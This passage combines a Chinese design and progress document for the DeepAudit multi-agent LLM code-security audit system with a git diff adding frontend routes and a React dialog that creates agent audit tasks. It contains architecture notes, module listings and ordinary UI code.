||||
|
||||
每个子 Agent 都有自己的工作循环:思考当前状态、选择工具执行、观察结果、决定下一步。这个循环会持续进行,直到 Agent 认为任务完成或达到迭代限制。
|
||||
|
||||
子 Agent 在分析过程中可能会发现需要进一步调查的线索。这时它可以创建更专业的子 Agent 来处理,形成多层的 Agent 树。
|
||||
|
||||
验证阶段
|
||||
当分析 Agent 发现可疑的漏洞时,它会创建验证 Agent 来确认漏洞是否真实存在。
|
||||
|
||||
验证 Agent 会尝试构造 PoC、进行数据流追踪、在沙箱中测试等。验证通过后,验证 Agent 会创建报告 Agent 来生成正式的漏洞报告。
|
||||
|
||||
如果验证失败,验证 Agent 会将结果反馈给父 Agent,父 Agent 可以决定是否需要进一步调查或将其标记为误报。
|
||||
|
||||
汇总阶段
|
||||
当所有子 Agent 都完成工作后,根 Agent 会汇总所有发现,生成最终的审计报告。
|
||||
|
||||
报告包括:发现的所有漏洞(按严重程度排序)、安全评分、技术栈分析、高风险区域标注、修复建议优先级等。
|
||||
|
||||
七、可观测性和调试
|
||||
完整的事件追踪
|
||||
系统会记录所有重要事件:Agent 创建和销毁、工具调用和结果、LLM 请求和响应、Agent 间消息、状态变更等。
|
||||
|
||||
这些事件可以实时推送到前端,让用户看到审计的进展。也可以持久化到数据库,用于后续分析和审计。
|
||||
|
||||
Agent 树可视化
|
||||
前端可以展示当前的 Agent 树结构,显示每个 Agent 的状态、任务、发现数量等信息。用户可以点击任何 Agent 查看其详细信息和对话历史。
|
||||
|
||||
调试模式
|
||||
在调试模式下,系统会记录更详细的信息,包括完整的 LLM 提示词和响应、工具执行的详细日志、状态变更的完整历史等。这些信息对于排查问题和优化系统非常有价值。
|
||||
|
||||
八、与现有架构的兼容
|
||||
渐进式迁移
|
||||
升级不需要一次性完成,可以渐进式进行。
|
||||
|
||||
第一步,保持现有的 LangGraph 流程不变,但将 Agent 的状态管理升级为新的模型。
|
||||
|
||||
第二步,引入专业知识模块系统,让现有的 Analysis Agent 可以加载不同的知识模块。
|
||||
|
||||
第三步,在 Analysis 阶段内部引入子 Agent 机制,允许创建专业的漏洞检测子 Agent。
|
||||
|
||||
第四步,逐步放开流程限制,让 Agent 可以更灵活地决定下一步操作。
|
||||
|
||||
第五步,完全迁移到动态 Agent 树架构。
|
||||
|
||||
保留 LangGraph 的优势
|
||||
LangGraph 提供了很好的状态管理和检查点机制,这些在新架构中仍然有价值。我们可以将 LangGraph 用于根 Agent 的高层编排,而在子 Agent 层面使用更灵活的动态创建机制。
|
||||
|
||||
九、预期收益
|
||||
更深度的漏洞发现
|
||||
专业知识模块让每个 Agent 都具备安全专家级别的知识。专注于单一漏洞类型的 Agent 比通用 Agent 更容易发现深层次的问题。
|
||||
|
||||
更高的效率
|
||||
并行的 Agent 执行比串行流程更快。动态任务分解避免了在无关区域浪费时间。
|
||||
|
||||
更低的成本
|
||||
Prompt Caching 和 Memory Compression 显著降低 Token 消耗。专业化的 Agent 使用更短的提示词就能达到更好的效果。
|
||||
|
||||
更好的可扩展性
|
||||
添加新的漏洞类型只需要创建新的知识模块。支持新的框架只需要添加框架知识模块。整个系统的扩展不需要修改核心架构。
|
||||
|
||||
更强的可解释性
|
||||
完整的事件追踪和 Agent 树可视化让用户清楚地了解系统在做什么。Think 工具的输出展示了 Agent 的推理过程。
|
||||
|
||||
这个升级方案借鉴了 Strix 的核心设计理念,同时保留了 DeepAudit 的既有优势,通过渐进式迁移降低风险,最终实现一个更强大、更灵活、更专业的安全审计 Agent 系统。
|
||||
|
||||
|
||||
---
|
||||
|
||||
## 十、实施进度记录
|
||||
|
||||
### 已完成的工作 (2024-12)
|
||||
|
||||
#### 1. 核心模块系统 ✅
|
||||
- `core/state.py`: 增强的Agent状态管理,支持完整生命周期
|
||||
- `core/registry.py`: Agent注册表和动态Agent树管理
|
||||
- `core/message.py`: Agent间通信机制(消息总线)
|
||||
|
||||
#### 2. 专业知识模块系统 ✅ (基于RAG)
|
||||
采用模块化文件组织,统一使用RAG进行知识检索:
|
||||
|
||||
```
|
||||
knowledge/
|
||||
├── base.py # 基础定义(KnowledgeDocument, KnowledgeCategory)
|
||||
├── loader.py # 知识加载器
|
||||
├── rag_knowledge.py # RAG检索系统
|
||||
├── tools.py # 知识查询工具
|
||||
├── vulnerabilities/ # 漏洞类型知识
|
||||
│ ├── injection.py # SQL注入、NoSQL注入、命令注入、代码注入
|
||||
│ ├── xss.py # 反射型XSS、存储型XSS、DOM型XSS
|
||||
│ ├── auth.py # 认证绕过、IDOR、访问控制失效
|
||||
│ ├── crypto.py # 弱加密、硬编码凭证
|
||||
│ ├── ssrf.py # SSRF
|
||||
│ ├── deserialization.py # 不安全的反序列化
|
||||
│ ├── path_traversal.py # 路径遍历
|
||||
│ ├── xxe.py # XXE
|
||||
│ └── race_condition.py # 竞态条件
|
||||
└── frameworks/ # 框架安全知识
|
||||
├── fastapi.py # FastAPI安全
|
||||
├── django.py # Django安全
|
||||
├── flask.py # Flask安全
|
||||
├── express.py # Express.js安全
|
||||
├── react.py # React安全
|
||||
└── supabase.py # Supabase安全
|
||||
```
|
||||
|
||||
#### 3. Agent基类增强 ✅
|
||||
- 支持动态Agent树(parent_id, 子Agent创建)
|
||||
- Agent间消息通信
|
||||
- TaskHandoff协作机制
|
||||
- 知识模块加载
|
||||
- Memory Compression集成
|
||||
|
||||
#### 4. 工具系统 ✅
|
||||
- `thinking_tool.py`: Think和Reflect工具
|
||||
- `reporting_tool.py`: 漏洞报告工具
|
||||
- `agent_tools.py`: Agent协作工具
|
||||
- CreateSubAgentTool: 动态创建子Agent
|
||||
- SendMessageTool: Agent间消息发送
|
||||
- ViewAgentGraphTool: 查看Agent树
|
||||
- WaitForMessageTool: 等待消息
|
||||
- AgentFinishTool: 子Agent完成报告
|
||||
|
||||
#### 5. LLM调用优化 ✅
|
||||
- `memory_compressor.py`: 对话历史压缩
|
||||
- 自动检测是否需要压缩
|
||||
- 保留关键信息(发现、工具使用、决策、错误)
|
||||
- 智能摘要生成
|
||||
- Agent基类集成自动压缩
|
||||
|
||||
#### 6. Orchestrator Agent ✅
|
||||
- LLM驱动的编排决策
|
||||
- 动态调度子Agent
|
||||
- ReAct模式执行
|
||||
|
||||
### 已完成的工作 (2024-12 续)
|
||||
|
||||
#### 7. Prompt Caching ✅
|
||||
- `llm/prompt_cache.py`: Prompt 缓存管理器
|
||||
- 支持 Anthropic Claude 的 Prompt Caching
|
||||
- 动态缓存策略(SYSTEM_ONLY, SYSTEM_AND_EARLY, MULTI_POINT)
|
||||
- 缓存统计和效果追踪
|
||||
- Token 估算工具
|
||||
- LiteLLM 适配器集成缓存支持
|
||||
|
||||
#### 8. 动态Agent树执行器 ✅
|
||||
- `core/executor.py`: 完整的执行器实现
|
||||
- `DynamicAgentExecutor`: 动态Agent树执行器
|
||||
- 并行Agent执行(带信号量控制)
|
||||
- 任务依赖管理
|
||||
- 执行结果汇总
|
||||
- 超时和取消处理
|
||||
- `SubAgentExecutor`: 子Agent执行器
|
||||
- 从父Agent创建和执行子Agent
|
||||
- 并行子Agent执行
|
||||
- 结果收集和汇总
|
||||
- `ExecutionTask`: 执行任务数据结构
|
||||
- `ExecutionResult`: 执行结果数据结构
|
||||
|
||||
#### 9. Agent状态持久化 ✅
|
||||
- `core/persistence.py`: 持久化模块
|
||||
- `AgentStatePersistence`: 状态持久化管理器
|
||||
- 文件系统持久化
|
||||
- 数据库持久化(可选)
|
||||
- 检查点列表和清理
|
||||
- `CheckpointManager`: 检查点管理器
|
||||
- 自动检查点(按迭代间隔)
|
||||
- 检查点恢复
|
||||
- 状态回滚
|
||||
|
||||
#### 10. 增强的Agent协作工具 ✅
|
||||
- `CreateSubAgentTool`: 增强版
|
||||
- 支持立即执行模式
|
||||
- 集成SubAgentExecutor
|
||||
- 上下文传递
|
||||
- `RunSubAgentsTool`: 批量执行子Agent
|
||||
- 并行/顺序执行
|
||||
- 结果汇总
|
||||
- `CollectSubAgentResultsTool`: 收集子Agent结果
|
||||
|
||||
#### 11. 数据库模型扩展 ✅
|
||||
- `AgentCheckpoint`: Agent检查点模型
|
||||
- 状态数据存储
|
||||
- 执行统计
|
||||
- 检查点类型(auto/manual/error/final)
|
||||
- `AgentTreeNode`: Agent树节点模型
|
||||
- 树结构记录
|
||||
- 执行状态追踪
|
||||
- 结果汇总
|
||||
- Alembic迁移脚本: `007_add_agent_checkpoint_tables.py`
|
||||
|
||||
#### 12. API 端点 ✅
|
||||
- `GET /agent-tasks/{task_id}/agent-tree`: Agent树查询API
|
||||
- 返回完整的Agent树结构
|
||||
- 支持运行时内存查询和数据库查询
|
||||
- 包含执行状态和发现统计
|
||||
- `GET /agent-tasks/{task_id}/checkpoints`: 检查点列表API
|
||||
- 支持按Agent ID过滤
|
||||
- 分页支持
|
||||
- `GET /agent-tasks/{task_id}/checkpoints/{checkpoint_id}`: 检查点详情API
|
||||
- 返回完整的Agent状态数据
|
||||
|
||||
### 已完成的工作 (2024-12 续2)
|
||||
|
||||
#### 13. 前端 Agent 审计页面 ✅ (Strix-inspired Terminal UI)
|
||||
- `frontend/src/shared/api/agentTasks.ts`: 扩展 API
|
||||
- `AgentTreeNode`, `AgentTreeResponse` 类型定义
|
||||
- `AgentCheckpoint`, `CheckpointDetail` 类型定义
|
||||
- `getAgentTree()`: 获取 Agent 树结构
|
||||
- `getAgentCheckpoints()`: 获取检查点列表
|
||||
- `getCheckpointDetail()`: 获取检查点详情
|
||||
|
||||
- `frontend/src/pages/AgentAudit.tsx`: 统一的 Agent 审计页面 (参考 Strix TUI 设计)
|
||||
- **布局**: 左侧活动日志 (75%) + 右侧 Agent 树和统计 (25%)
|
||||
- **启动画面**: ASCII Art + 动画加载效果
|
||||
- **活动日志**:
|
||||
- 实时流式显示 Agent 思考过程
|
||||
- 工具调用和结果展示
|
||||
- 漏洞发现高亮
|
||||
- 自动滚动控制
|
||||
- 可折叠的日志条目
|
||||
- **Agent 树可视化**:
|
||||
- 树状结构展示
|
||||
- 节点状态图标(运行中/已完成/失败/等待)
|
||||
- 发现数量徽章
|
||||
- 节点选择交互
|
||||
- **实时统计面板**:
|
||||
- 进度百分比
|
||||
- 文件分析进度
|
||||
- Token 使用量
|
||||
- 发现数量
|
||||
- 严重程度分布
|
||||
- **创建任务对话框**: 选择项目后直接跳转到实时流页面
|
||||
- **任务控制**: 停止/取消任务
|
||||
|
||||
- `frontend/src/app/routes.tsx`: 路由配置
|
||||
- `/agent-audit`: 启动画面 + 创建任务
|
||||
- `/agent-audit/:taskId`: 任务实时流页面
|
||||
|
||||
- `frontend/src/components/layout/Sidebar.tsx`: 侧边栏导航
|
||||
- 新增 Agent 审计入口图标
|
||||
|
||||
### 已完成的工作 (2024-12 续3)
|
||||
|
||||
#### 14. 执行架构切换 ✅
|
||||
- **移除旧的 LangGraph 固定流程架构**
|
||||
- **启用新的动态 Agent 树架构**
|
||||
- `backend/app/api/v1/endpoints/agent_tasks.py`:
|
||||
- `_execute_agent_task()` 重写为使用 `OrchestratorAgent`
|
||||
- OrchestratorAgent 作为大脑,动态调度子 Agent
|
||||
- 子 Agent: ReconAgent, AnalysisAgent, VerificationAgent
|
||||
- 新增辅助函数: `_get_user_config()`, `_initialize_tools()`, `_collect_project_info()`, `_save_findings()`, `_calculate_security_score()`
|
||||
|
||||
### 待完成的工作
|
||||
|
||||
#### 1. 前端增强
|
||||
- 知识模块选择 UI(创建任务时)
|
||||
- 检查点恢复功能
|
||||
- 导出报告功能
|
||||
|
||||
#### 2. 测试和优化
|
||||
- 单元测试
|
||||
- 集成测试
|
||||
- 性能优化
|
||||
- 并发执行压力测试
|
||||
|
||||
#### 3. 文档
|
||||
- API文档更新
|
||||
- 架构图更新
|
||||
- 使用指南
|
||||
|
||||
---
|
||||
|
||||
## 十一、架构升级总结
|
||||
|
||||
### 已实现的核心功能
|
||||
|
||||
1. **Prompt Caching** - 为 Claude 等 LLM 提供缓存支持,减少 Token 消耗
|
||||
2. **动态 Agent 树执行** - OrchestratorAgent 作为大脑,动态调度子 Agent
|
||||
3. **Agent 状态持久化** - 文件系统和数据库双重持久化
|
||||
4. **检查点机制** - 自动检查点、状态恢复、执行历史追踪
|
||||
5. **增强的协作工具** - 子 Agent 创建、批量执行、结果收集
|
||||
6. **完整的 API 支持** - Agent 树查询、检查点管理
|
||||
7. **旧架构已移除** - 不再使用 LangGraph 固定流程,完全切换到动态 Agent 树
|
||||
|
||||
### 文件清单
|
||||
|
||||
```
|
||||
backend/app/services/
|
||||
├── llm/
|
||||
│ ├── __init__.py # 模块导出
|
||||
│ ├── prompt_cache.py # 🆕 Prompt Caching
|
||||
│ ├── memory_compressor.py # Memory Compression
|
||||
│ └── adapters/
|
||||
│ └── litellm_adapter.py # 集成 Prompt Caching
|
||||
│
|
||||
├── agent/
|
||||
│ ├── core/
|
||||
│ │ ├── __init__.py # 模块导出
|
||||
│ │ ├── state.py # Agent 状态管理
|
||||
│ │ ├── registry.py # Agent 注册表
|
||||
│ │ ├── message.py # Agent 间通信
|
||||
│ │ ├── executor.py # 🆕 动态 Agent 树执行器
|
||||
│ │ └── persistence.py # 🆕 状态持久化
|
||||
│ │
|
||||
│ ├── tools/
|
||||
│ │ ├── __init__.py # 模块导出
|
||||
│ │ ├── agent_tools.py # 🔄 增强的协作工具
|
||||
│ │ ├── thinking_tool.py # Think/Reflect 工具
|
||||
│ │ └── reporting_tool.py # 漏洞报告工具
|
||||
│ │
|
||||
│ ├── knowledge/ # 专业知识模块
|
||||
│ │ ├── vulnerabilities/ # 漏洞类型知识
|
||||
│ │ └── frameworks/ # 框架安全知识
|
||||
│ │
|
||||
│ └── agents/
|
||||
│ ├── base.py # Agent 基类
|
||||
│ ├── orchestrator.py # 编排 Agent
|
||||
│ ├── analysis.py # 分析 Agent
|
||||
│ └── verification.py # 验证 Agent
|
||||
|
||||
backend/app/models/
|
||||
└── agent_task.py # 🔄 新增 AgentCheckpoint, AgentTreeNode
|
||||
|
||||
backend/app/api/v1/endpoints/
|
||||
└── agent_tasks.py # 🔄 新增 Agent 树和检查点 API
|
||||
|
||||
backend/alembic/versions/
|
||||
└── 007_add_agent_checkpoint_tables.py # 🆕 数据库迁移
|
||||
|
||||
frontend/src/shared/api/
|
||||
└── agentTasks.ts # 🔄 扩展 Agent 树和检查点 API
|
||||
|
||||
frontend/src/pages/
|
||||
└── AgentAudit.tsx # 🆕 统一的 Agent 审计页面 (Strix-inspired)
|
||||
|
||||
frontend/src/app/
|
||||
└── routes.tsx # 🔄 新增 Agent 审计路由
|
||||
|
||||
frontend/src/components/layout/
|
||||
└── Sidebar.tsx # 🔄 新增 Agent 审计导航图标
|
||||
```
|
||||
|
||||
### 下一步计划
|
||||
|
||||
1. 测试前端页面渲染和流式事件
|
||||
2. 知识模块选择 UI
|
||||
3. 检查点恢复功能
|
||||
|
|
@ -59,6 +59,12 @@ const routes: RouteConfig[] = [
|
|||
},
|
||||
{
|
||||
name: "Agent审计",
|
||||
path: "/agent-audit",
|
||||
element: <AgentAudit />,
|
||||
visible: true,
|
||||
},
|
||||
{
|
||||
name: "Agent审计任务",
|
||||
path: "/agent-audit/:taskId",
|
||||
element: <AgentAudit />,
|
||||
visible: false,
|
||||
|
|
|
|||
|
|
@ -0,0 +1,593 @@
|
|||
/**
|
||||
* Agent 审计任务创建对话框
|
||||
* 专门用于 Agent Audit 页面,UI 风格与终端界面保持一致
|
||||
*/
|
||||
|
||||
import { useState, useEffect, useMemo } from "react";
|
||||
import { useNavigate } from "react-router-dom";
|
||||
import {
|
||||
Dialog,
|
||||
DialogContent,
|
||||
DialogHeader,
|
||||
DialogTitle,
|
||||
} from "@/components/ui/dialog";
|
||||
import { Button } from "@/components/ui/button";
|
||||
import { Input } from "@/components/ui/input";
|
||||
import { Badge } from "@/components/ui/badge";
|
||||
import { ScrollArea } from "@/components/ui/scroll-area";
|
||||
import {
|
||||
Collapsible,
|
||||
CollapsibleContent,
|
||||
CollapsibleTrigger,
|
||||
} from "@/components/ui/collapsible";
|
||||
import {
|
||||
Select,
|
||||
SelectContent,
|
||||
SelectItem,
|
||||
SelectTrigger,
|
||||
SelectValue,
|
||||
} from "@/components/ui/select";
|
||||
import {
|
||||
Search,
|
||||
ChevronRight,
|
||||
GitBranch,
|
||||
Package,
|
||||
Globe,
|
||||
Loader2,
|
||||
Bot,
|
||||
Settings2,
|
||||
Play,
|
||||
Upload,
|
||||
FolderOpen,
|
||||
} from "lucide-react";
|
||||
import { toast } from "sonner";
|
||||
import { api } from "@/shared/config/database";
|
||||
import { createAgentTask } from "@/shared/api/agentTasks";
|
||||
import { isRepositoryProject, isZipProject } from "@/shared/utils/projectUtils";
|
||||
import { getZipFileInfo, type ZipFileMeta } from "@/shared/utils/zipStorage";
|
||||
import { validateZipFile } from "@/features/projects/services/repoZipScan";
|
||||
import type { Project } from "@/shared/types";
|
||||
import FileSelectionDialog from "@/components/audit/FileSelectionDialog";
|
||||
|
||||
interface CreateAgentTaskDialogProps {
|
||||
open: boolean;
|
||||
onOpenChange: (open: boolean) => void;
|
||||
}
|
||||
|
||||
const DEFAULT_EXCLUDES = [
|
||||
"node_modules/**",
|
||||
".git/**",
|
||||
"dist/**",
|
||||
"build/**",
|
||||
"*.log",
|
||||
];
|
||||
|
||||
export default function CreateAgentTaskDialog({
|
||||
open,
|
||||
onOpenChange,
|
||||
}: CreateAgentTaskDialogProps) {
|
||||
const navigate = useNavigate();
|
||||
|
||||
// 状态
|
||||
const [projects, setProjects] = useState<Project[]>([]);
|
||||
const [loadingProjects, setLoadingProjects] = useState(true);
|
||||
const [selectedProjectId, setSelectedProjectId] = useState<string>("");
|
||||
const [searchTerm, setSearchTerm] = useState("");
|
||||
const [branch, setBranch] = useState("main");
|
||||
const [branches, setBranches] = useState<string[]>([]);
|
||||
const [loadingBranches, setLoadingBranches] = useState(false);
|
||||
const [excludePatterns, setExcludePatterns] = useState(DEFAULT_EXCLUDES);
|
||||
const [showAdvanced, setShowAdvanced] = useState(false);
|
||||
const [creating, setCreating] = useState(false);
|
||||
|
||||
// ZIP 文件状态
|
||||
const [zipFile, setZipFile] = useState<File | null>(null);
|
||||
const [storedZipInfo, setStoredZipInfo] = useState<ZipFileMeta | null>(null);
|
||||
const [useStoredZip, setUseStoredZip] = useState(true);
|
||||
|
||||
// 文件选择状态
|
||||
const [selectedFiles, setSelectedFiles] = useState<string[] | undefined>();
|
||||
const [showFileSelection, setShowFileSelection] = useState(false);
|
||||
|
||||
const selectedProject = projects.find((p) => p.id === selectedProjectId);
|
||||
|
||||
// 加载项目列表
|
||||
useEffect(() => {
|
||||
if (open) {
|
||||
setLoadingProjects(true);
|
||||
api.getProjects()
|
||||
.then((data) => {
|
||||
setProjects(data.filter((p: Project) => p.is_active));
|
||||
})
|
||||
.catch(() => {
|
||||
toast.error("加载项目列表失败");
|
||||
})
|
||||
.finally(() => setLoadingProjects(false));
|
||||
|
||||
// 重置状态
|
||||
setSelectedProjectId("");
|
||||
setSearchTerm("");
|
||||
setBranch("main");
|
||||
setExcludePatterns(DEFAULT_EXCLUDES);
|
||||
setShowAdvanced(false);
|
||||
setZipFile(null);
|
||||
setStoredZipInfo(null);
|
||||
setSelectedFiles(undefined);
|
||||
}
|
||||
}, [open]);
|
||||
|
||||
// 加载分支列表
|
||||
useEffect(() => {
|
||||
const loadBranches = async () => {
|
||||
// 使用 selectedProjectId 从 projects 中获取最新的 project 对象
|
||||
const project = projects.find((p) => p.id === selectedProjectId);
|
||||
if (!project || !isRepositoryProject(project)) {
|
||||
setBranches([]);
|
||||
return;
|
||||
}
|
||||
|
||||
setLoadingBranches(true);
|
||||
try {
|
||||
const result = await api.getProjectBranches(project.id);
|
||||
console.log("[Branch] 加载分支结果:", result);
|
||||
|
||||
if (result.error) {
|
||||
console.warn("[Branch] 加载分支警告:", result.error);
|
||||
toast.error(`加载分支失败: ${result.error}`);
|
||||
}
|
||||
|
||||
setBranches(result.branches);
|
||||
if (result.default_branch) {
|
||||
setBranch(result.default_branch);
|
||||
}
|
||||
} catch (err) {
|
||||
const msg = err instanceof Error ? err.message : "未知错误";
|
||||
console.error("[Branch] 加载分支失败:", msg);
|
||||
toast.error(`加载分支失败: ${msg}`);
|
||||
setBranches([project.default_branch || "main"]);
|
||||
} finally {
|
||||
setLoadingBranches(false);
|
||||
}
|
||||
};
|
||||
|
||||
loadBranches();
|
||||
}, [selectedProjectId, projects]);
|
||||
|
||||
// 加载 ZIP 文件信息
|
||||
useEffect(() => {
|
||||
const loadZipInfo = async () => {
|
||||
if (!selectedProject || !isZipProject(selectedProject)) {
|
||||
setStoredZipInfo(null);
|
||||
return;
|
||||
}
|
||||
|
||||
try {
|
||||
const info = await getZipFileInfo(selectedProject.id);
|
||||
setStoredZipInfo(info);
|
||||
setUseStoredZip(info.has_file);
|
||||
} catch {
|
||||
setStoredZipInfo(null);
|
||||
}
|
||||
};
|
||||
|
||||
loadZipInfo();
|
||||
}, [selectedProject?.id]);
|
||||
|
||||
// 过滤项目
|
||||
const filteredProjects = useMemo(() => {
|
||||
if (!searchTerm) return projects;
|
||||
const term = searchTerm.toLowerCase();
|
||||
return projects.filter(
|
||||
(p) =>
|
||||
p.name.toLowerCase().includes(term) ||
|
||||
p.description?.toLowerCase().includes(term)
|
||||
);
|
||||
}, [projects, searchTerm]);
|
||||
|
||||
// 是否可以开始
|
||||
const canStart = useMemo(() => {
|
||||
if (!selectedProject) return false;
|
||||
if (isZipProject(selectedProject)) {
|
||||
return (useStoredZip && storedZipInfo?.has_file) || !!zipFile;
|
||||
}
|
||||
return !!selectedProject.repository_url && !!branch.trim();
|
||||
}, [selectedProject, useStoredZip, storedZipInfo, zipFile, branch]);
|
||||
|
||||
// 创建任务
|
||||
const handleCreate = async () => {
|
||||
if (!selectedProject) return;
|
||||
|
||||
setCreating(true);
|
||||
try {
|
||||
const agentTask = await createAgentTask({
|
||||
project_id: selectedProject.id,
|
||||
name: `Agent审计-${selectedProject.name}`,
|
||||
branch_name: isRepositoryProject(selectedProject) ? branch : undefined,
|
||||
exclude_patterns: excludePatterns,
|
||||
target_files: selectedFiles,
|
||||
verification_level: "sandbox",
|
||||
});
|
||||
|
||||
onOpenChange(false);
|
||||
toast.success("Agent 审计任务已创建");
|
||||
navigate(`/agent-audit/${agentTask.id}`);
|
||||
} catch (err) {
|
||||
const msg = err instanceof Error ? err.message : "创建失败";
|
||||
toast.error(msg);
|
||||
} finally {
|
||||
setCreating(false);
|
||||
}
|
||||
};
|
||||
|
||||
// 处理文件上传
|
||||
const handleFileChange = (e: React.ChangeEvent<HTMLInputElement>) => {
|
||||
const file = e.target.files?.[0];
|
||||
if (file) {
|
||||
const validation = validateZipFile(file);
|
||||
if (!validation.valid) {
|
||||
toast.error(validation.error || "文件无效");
|
||||
e.target.value = "";
|
||||
return;
|
||||
}
|
||||
setZipFile(file);
|
||||
setUseStoredZip(false);
|
||||
}
|
||||
};
|
||||
|
||||
return (
|
||||
<Dialog open={open} onOpenChange={onOpenChange}>
|
||||
<DialogContent className="!w-[min(90vw,480px)] !max-w-none max-h-[85vh] flex flex-col p-0 gap-0 bg-[#0d0d12] border border-gray-800 rounded-lg">
|
||||
{/* Header */}
|
||||
<DialogHeader className="px-5 py-4 border-b border-gray-800 flex-shrink-0">
|
||||
<DialogTitle className="flex items-center gap-3 font-mono text-white">
|
||||
<div className="p-2 bg-primary/20 rounded">
|
||||
<Bot className="w-5 h-5 text-primary" />
|
||||
</div>
|
||||
<div>
|
||||
<span className="text-base font-bold">New Agent Audit</span>
|
||||
<p className="text-xs text-gray-500 font-normal mt-0.5">
|
||||
AI-Powered Security Analysis
|
||||
</p>
|
||||
</div>
|
||||
</DialogTitle>
|
||||
</DialogHeader>
|
||||
|
||||
<div className="flex-1 overflow-y-auto p-5 space-y-5">
|
||||
{/* 项目选择 */}
|
||||
<div className="space-y-3">
|
||||
<div className="flex items-center justify-between">
|
||||
<span className="text-xs font-mono font-bold uppercase text-gray-400">
|
||||
Select Project
|
||||
</span>
|
||||
<Badge variant="outline" className="border-gray-700 text-gray-500 font-mono text-[10px]">
|
||||
{filteredProjects.length} available
|
||||
</Badge>
|
||||
</div>
|
||||
|
||||
{/* 搜索框 */}
|
||||
<div className="relative">
|
||||
<Search className="absolute left-3 top-1/2 -translate-y-1/2 w-4 h-4 text-gray-600" />
|
||||
<Input
|
||||
placeholder="Search projects..."
|
||||
value={searchTerm}
|
||||
onChange={(e) => setSearchTerm(e.target.value)}
|
||||
className="pl-9 h-10 bg-gray-900/50 border-gray-800 text-white font-mono placeholder:text-gray-600 focus:border-primary focus:ring-0"
|
||||
/>
|
||||
</div>
|
||||
|
||||
{/* 项目列表 */}
|
||||
<ScrollArea className="h-[200px] border border-gray-800 rounded-lg bg-gray-900/30">
|
||||
{loadingProjects ? (
|
||||
<div className="flex items-center justify-center h-full">
|
||||
<Loader2 className="w-5 h-5 animate-spin text-primary" />
|
||||
</div>
|
||||
) : filteredProjects.length === 0 ? (
|
||||
<div className="flex flex-col items-center justify-center h-full text-gray-600 font-mono">
|
||||
<Package className="w-8 h-8 mb-2 opacity-50" />
|
||||
<span className="text-sm">{searchTerm ? "No matches" : "No projects"}</span>
|
||||
</div>
|
||||
) : (
|
||||
<div className="p-1">
|
||||
{filteredProjects.map((project) => (
|
||||
<ProjectItem
|
||||
key={project.id}
|
||||
project={project}
|
||||
selected={selectedProjectId === project.id}
|
||||
onSelect={() => setSelectedProjectId(project.id)}
|
||||
/>
|
||||
))}
|
||||
</div>
|
||||
)}
|
||||
</ScrollArea>
|
||||
</div>
|
||||
|
||||
{/* 配置区域 */}
|
||||
{selectedProject && (
|
||||
<div className="space-y-4">
|
||||
{/* 仓库项目:分支选择 */}
|
||||
{isRepositoryProject(selectedProject) && (
|
||||
<div className="flex items-center gap-3 p-3 border border-gray-800 rounded-lg bg-blue-950/20">
|
||||
<GitBranch className="w-5 h-5 text-blue-400" />
|
||||
<span className="font-mono text-sm text-gray-400 w-16">Branch</span>
|
||||
{loadingBranches ? (
|
||||
<div className="flex items-center gap-2 flex-1">
|
||||
<Loader2 className="w-4 h-4 animate-spin text-blue-400" />
|
||||
<span className="text-sm text-blue-400 font-mono">Loading...</span>
|
||||
</div>
|
||||
) : (
|
||||
<Select value={branch} onValueChange={setBranch}>
|
||||
<SelectTrigger className="flex-1 h-9 bg-gray-900/50 border-gray-700 text-white font-mono focus:ring-0">
|
||||
<SelectValue placeholder="Select branch" />
|
||||
</SelectTrigger>
|
||||
<SelectContent className="bg-gray-900 border-gray-700">
|
||||
{branches.map((b) => (
|
||||
<SelectItem key={b} value={b} className="font-mono text-white">
|
||||
{b}
|
||||
</SelectItem>
|
||||
))}
|
||||
</SelectContent>
|
||||
</Select>
|
||||
)}
|
||||
</div>
|
||||
)}
|
||||
|
||||
{/* ZIP 项目:文件选择 */}
|
||||
{isZipProject(selectedProject) && (
|
||||
<div className="p-3 border border-gray-800 rounded-lg bg-amber-950/20 space-y-3">
|
||||
<div className="flex items-center gap-3">
|
||||
<Package className="w-5 h-5 text-amber-400" />
|
||||
<span className="font-mono text-sm text-gray-400">ZIP File</span>
|
||||
</div>
|
||||
|
||||
{storedZipInfo?.has_file && (
|
||||
<div
|
||||
className={`p-2 rounded border cursor-pointer transition-colors ${
|
||||
useStoredZip
|
||||
? 'border-green-500 bg-green-950/30'
|
||||
: 'border-gray-700 hover:border-gray-600'
|
||||
}`}
|
||||
onClick={() => setUseStoredZip(true)}
|
||||
>
|
||||
<div className="flex items-center gap-2">
|
||||
<div className={`w-3 h-3 rounded-full border-2 ${
|
||||
useStoredZip ? 'border-green-500 bg-green-500' : 'border-gray-600'
|
||||
}`} />
|
||||
<span className="text-sm text-white font-mono">
|
||||
{storedZipInfo.original_filename}
|
||||
</span>
|
||||
<Badge className="bg-green-500/20 text-green-400 border-0 text-[10px]">
|
||||
Stored
|
||||
</Badge>
|
||||
</div>
|
||||
</div>
|
||||
)}
|
||||
|
||||
<div
|
||||
className={`p-2 rounded border cursor-pointer transition-colors ${
|
||||
!useStoredZip && zipFile
|
||||
? 'border-amber-500 bg-amber-950/30'
|
||||
: 'border-gray-700 hover:border-gray-600'
|
||||
}`}
|
||||
>
|
||||
<label className="flex items-center gap-2 cursor-pointer">
|
||||
<div className={`w-3 h-3 rounded-full border-2 ${
|
||||
!useStoredZip && zipFile ? 'border-amber-500 bg-amber-500' : 'border-gray-600'
|
||||
}`} />
|
||||
<Upload className="w-4 h-4 text-gray-500" />
|
||||
<span className="text-sm text-gray-400 font-mono">
|
||||
{zipFile ? zipFile.name : "Upload new file..."}
|
||||
</span>
|
||||
<input
|
||||
type="file"
|
||||
accept=".zip"
|
||||
onChange={handleFileChange}
|
||||
className="hidden"
|
||||
/>
|
||||
</label>
|
||||
</div>
|
||||
</div>
|
||||
)}
|
||||
|
||||
{/* 高级选项 */}
|
||||
<Collapsible open={showAdvanced} onOpenChange={setShowAdvanced}>
|
||||
<CollapsibleTrigger className="flex items-center gap-2 text-xs font-mono text-gray-500 hover:text-gray-300 transition-colors">
|
||||
<ChevronRight className={`w-4 h-4 transition-transform ${showAdvanced ? "rotate-90" : ""}`} />
|
||||
<Settings2 className="w-4 h-4" />
|
||||
<span className="uppercase font-bold">Advanced Options</span>
|
||||
</CollapsibleTrigger>
|
||||
<CollapsibleContent className="mt-3 space-y-3">
|
||||
{/* 文件选择 */}
|
||||
{(() => {
|
||||
const isRepo = isRepositoryProject(selectedProject);
|
||||
const isZip = isZipProject(selectedProject);
|
||||
const hasStoredZip = storedZipInfo?.has_file;
|
||||
// 可以选择文件的条件:仓库项目 或 ZIP项目使用已存储文件
|
||||
